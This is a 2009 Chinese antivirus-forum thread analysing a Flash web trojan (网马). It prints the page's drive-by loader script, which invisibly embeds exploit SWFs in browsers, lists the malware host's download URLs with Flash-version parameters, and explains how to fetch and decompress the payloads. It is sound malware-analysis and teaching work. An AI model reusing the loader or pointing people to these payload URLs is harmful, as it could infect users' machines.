瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 再谈flash网马解密(二)
networkedition - 2009-7-1 9:43:00
flash网马地址:http://vpsvip.com/aa/vcfl.htm,使用freshow获取的源代码如下:

[复制到剪贴板]
CODE:
<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"ms"+"ie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"1111111111.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"1111111111.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"2222222222.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2009-7-1 9:52:00
我们先来简单分析一下这段代码,主要是下面两段代码:

 
document.writeln("document.write(\'<embed src=\"1111111111.swf\"\/>\');");

document.writeln("else{document.write(\'<EMBED src=\"2222222222.swf\" width=0 height=0>\');}");

实际上这个源代码中包含有两个swf文件,其下载地址分别为:http://vpsvip.com/aa/1111111111.swf,http://vpsvip.com/aa/2222222222.swf。

使用下载工具将swf下载(以1111111111.swf为例),使用记事本方式打开,其源文件内容如下:

networkedition - 2009-7-1 10:09:00
我们着重来看红色框内容:flashVersion /:$version i1007.asp?ytytyt= _root ?,这段代码是否很熟悉,在我们讲解的一个迷惑人的flash网马一文中,讲到过类似内容。在这里我就不在详细讲解,具体可参看一个迷惑人的flash网马一文中,6楼小聪版主讲解的关于Flashver正确形式内容。


  我们参照该文中Flashver形式,实际上真正的swf网马下载地址如下:http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,28,0
或http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,16,0其余版本都可以,这里就不依次写出。


按照这个地址我们使用下载工具,下载到一个i1007.swf文件,也有可能为i1007.asp,将asp改为swf即可。

networkedition - 2009-7-1 10:14:00
使用redoce的A>PDF/CWS/Zlib Extractor,进行swf解密,具体操作方法可参看教程:网马解密工具redoce视频之——swf篇 一文。

最终解密结果见下图:




2222222222.swf这个swf网马就不讲解了,感兴趣的可参考本篇教程,自行尝试解密,方法都一样。
pcshare - 2009-7-1 23:43:00
这种木马是怎么生效的 ?:kaka1:
於陵闲云 - 2009-7-2 21:26:00
后排坚持听讲:kaka12:
青春小痞 - 2009-7-3 9:02:00
我解压程序后也有乱码,为什么会出现乱码啊
⒎溡ωǒ很壞 - 2009-7-3 12:46:00
乱码是应为 swf文件用TXT格式打开
基牛 - 2009-8-11 10:11:00
http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,28,0
或http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,16,0
后面的WIN%209,0,16,0,WIN%209,0,28,0这两个是怎么得出来的:kaka9:
networkedition - 2009-8-11 10:22:00
具体可参看一个迷惑人的flash网马一文中,6楼小聪版主讲解的关于Flashver正确形式内容。
暗夜的雪 - 2010-2-4 13:30:00
只要是
win 9,0,16,0
win 9,0,28,0
win 9,0,45,0
win 9,0,47,0
win 9,0,64,0
win 9,0,115,0
其中任何一种都可以么?这是不是SWF的版本号?
一个人奋斗 - 2010-2-5 22:40:00
长知识了!:kaka7:
1
查看完整版本: 再谈flash网马解密(二)
© 2000 - 2024 Rising Corp. Ltd.